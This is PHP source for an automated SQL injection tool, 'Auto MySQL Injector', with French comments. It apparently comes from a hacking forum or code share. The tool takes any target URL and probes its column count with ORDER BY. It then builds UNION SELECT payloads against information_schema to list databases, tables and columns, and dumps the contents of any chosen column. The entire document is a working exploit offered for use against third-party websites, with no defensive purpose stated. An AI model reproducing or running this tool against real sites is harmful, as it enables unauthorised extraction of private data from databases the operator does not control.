#Auto MySQL Injector Beta v0.7
#Auteur: Hypnoze57
#index.php:
<?php
##############################
# Injecteur de requettes SQL #
# Coder par Hypnoze57 #
##############################
session_start();
set_time_limit(0);
require_once('fonctions.php');
$version = 'Beta v0.7';
echo '<title>Injecteur SQL Automatisé</title><link rel="stylesheet" media="screen" type="text/css" title="Design" href="style.css" />';
echo '<b><u>Injecteur SQL automatisé version '.$version.'</u></b><br /><br />';
if (isset($_GET['url']) OR (isset($_GET['db']))) {
if(!empty($_GET['url'])) {
if(preg_match('#http://#', $_GET['url'])) {
$url = htmlentities(urldecode($_GET['url']));
$url_dep = htmlentities(urldecode($_GET['url']));
$nb_col = nb_col($url);
echo 'Nombre de columns : <font color="red">'.$nb_col.'</font><br />';
$url = str_replace('=', '=-', $url);
$url = injection($url, $nb_col);
$str_col = string_col($url, $nb_col);
echo 'String column valide : <font color="red">'.$str_col.'</font><br />';
find_vers_user($url, $str_col);
echo '<u>Bases de données : </u><br /><br />';
find_db($url, $str_col, $url_dep);
find_tbl($url, $str_col, $url_dep);
find_col($url, $str_col, $url_dep);
find_content($url, $str_col, $url_dep);
echo '<br />';
} else {
echo 'URL Incorrecte ...<br />
<a href="index.php">Retour à l\'index</a><br />';
}
} else {
echo 'Entrer un lien a injecter ...';
}
} else {
echo '<form action="" method="get">
URL : <input type="text" name="url" size="50" placeholder="http://site.com/page.php?id=1" value=""><br />
<input type="submit" value="Inject">
</form>';
}
echo '<br />Coded by Hypnoze57';
?>
#fonctions.php
<?php
##############################
# Fonctions de requettes SQL #
# Coder par Hypnoze57 #
##############################
#Recherche du nombre de colonne;
function nb_col($url) {
for($i=1;$i<=50;$i++) {
$page = file_get_contents($url . '+OrDeR+bY+' . $i . '--+-');
if(preg_match("#Unknown column|on line|Warning MySQL#", $page)) {
$col_nb = $i -1;
break;
}
}
return $col_nb;
}
#Première injection;
function injection($url, $nb_col) {
$chaine = '';
for($i=1;$i<=$nb_col;$i++) {
$chaine .= $i.',';
}
$chaine = substr($chaine, 0, -1);
$url .= '+UniOn+SeLecT+'.$chaine.'--+-';
return $url;
}
#Recherche de la colonne vulnérable;
function string_col($url, $nb_col) {
for($i=1;$i<=$nb_col;$i++) {
$str = str_replace(','.$i.',', ',0x4879706E6F7A653537,', $url);
$page = file_get_contents($str);
if(preg_match("#Hypnoze57#", $page)) {
$str_col = $i;
break;
}
}
return $str_col;
}
#Recherche de l'user et de la version de la bdd;
function find_vers_user($url, $str_col) {
$url = str_replace(','.$str_col.',', ',GrouP_CoNcaT(0x3A6835373A,VerSion(),0x3A2F6835373A),', $url);
$pg = file_get_contents($url);
preg_match('#:h57:(.*):/h57:#', $pg, $version);
$url = str_replace('VerSion()', 'UseR()', $url);
$pg = file_get_contents($url);
preg_match('#:h57:(.*):/h57#', $pg, $user);
echo 'Version : <font color="red">'.$version[1].'</font><br />User : <font color="red">'.$user[1].'</font><br /><br />';
}
#Recherche des bases de données;
function find_db($url, $str_col, $url_dep) {
$db = str_replace(','.$str_col.',', ',GrouP_CoNcaT(0x3A6835373A,SchEmA_NamE,0x3A2F6835373A),', $url);
$db = str_replace('--+-', '+FroM+iNForMaTion_SchEmA.SchEmAta--+-', $db);
$page = file_get_contents($db);
$page = str_replace(',', '', $page);
preg_match('#:h57:(.*):/h57:#', $page, $db_name);
$bdd = explode(':/h57::h57:', $db_name[1]);
foreach ($bdd as $base) {
echo '<a href="?url='.urlencode($url_dep).'&db='.$base.'">'.$base.'</a><br />';
}
}
#Recherche des tables;
function find_tbl($url, $str_col, $url_dep) {
if(isset($_GET['db'])) {
echo '<br /><u>Tables de la base '.$_GET['db'].' : </u><br /><br />';
$tbl = str_replace(','.$str_col.',', ',GrouP_CoNcaT(0x3A6835373A,TabLe_NaMe,0x3A2F6835373A),', $url);
$db = str2hex($_GET['db']);
$bd = $_GET['db'];
$tbl = str_replace('--+-', '+FroM+iNForMaTion_SchEmA.TabLes+where+TabLe_SchEmA='.$db.'--+-', $tbl);
$page = file_get_contents($tbl);
preg_match('#:h57:(.*):/h57:#', $page, $tbl_name);
$tables = explode(':/h57:,:h57:', $tbl_name[1]);
foreach($tables as $tbl_fin) {
echo '<a href="?url='.urlencode($url_dep).'&db='.$bd.'&tbl='.$tbl_fin.'">'.$tbl_fin.'</a><br />';
}
}
}
#Recherche des colonnes;
function find_col($url, $str_col, $url_dep) {
if(isset($_GET['tbl'])) {
echo '<br /><u>Colonnes de la table '.htmlspecialchars($_GET['tbl']).' :</u><br /><br />';
$db = str2hex($_GET['db']);
$tbl = str2hex($_GET['tbl']);
$url = str_replace(','.$str_col.',', ',GrouP_CoNcaT(0x3A6835373A,column_name,0x3A2F6835373A),', $url);
$url = str_replace('--+-', '+FroM+iNForMaTion_ScheMa.columNs+WhErE+tablE_scheMa='.$db.'+AnD+TablE_nAme='.$tbl.'--+-', $url);
$pg = file_get_contents($url);
preg_match('#:h57:(.*):/h57:#', $pg, $col_name);
$colonne = explode(':/h57:,:h57:', $col_name[1]);
foreach($colonne as $col_fin) {
echo '<a href="?url='.urlencode($url_dep).'&db='.$_GET['db'].'&tbl='.$_GET['tbl'].'&col='.$col_fin.'">'.$col_fin.'</a><br />';
}
}
}
#Recherche du contenu;
function find_content($url, $str_col, $url_dep) {
if(isset($_GET['col'])) {
echo '<br /><u>Contenu de la colonne '.htmlspecialchars($_GET['col']).' dans la table '.htmlspecialchars($_GET['tbl']).' :</u><br /><br />';
$url = str_replace(','.$str_col.',', ',GrouP_CoNcaT(0x3A6835373A,'.$_GET['col'].',0x3A2F6835373A),', $url);
$url = str_replace('--+-', '+FroM+'.$_GET['db'].'.'.$_GET['tbl'].'--+-', $url);
$pg = file_get_contents($url);
preg_match('#:h57:(.*):/h57:#', $pg, $content);
$contents = explode(':/h57:,:h57:', $content[1]);
foreach($contents as $content_fin) {
echo '<font color="red">'.$content_fin.'</font><br />';
}
}
}
#Fonction de conversion de table (exemple : admin = 0x61646d696e) - fonction coder par Luxerails;
function str2hex($str) {
$strout = '0x';
for ($i=0; $i < strlen($str); $i++) {
$strout .= dechex(ord($str{$i}));
}
return $strout;
}
?>
Hypnoze57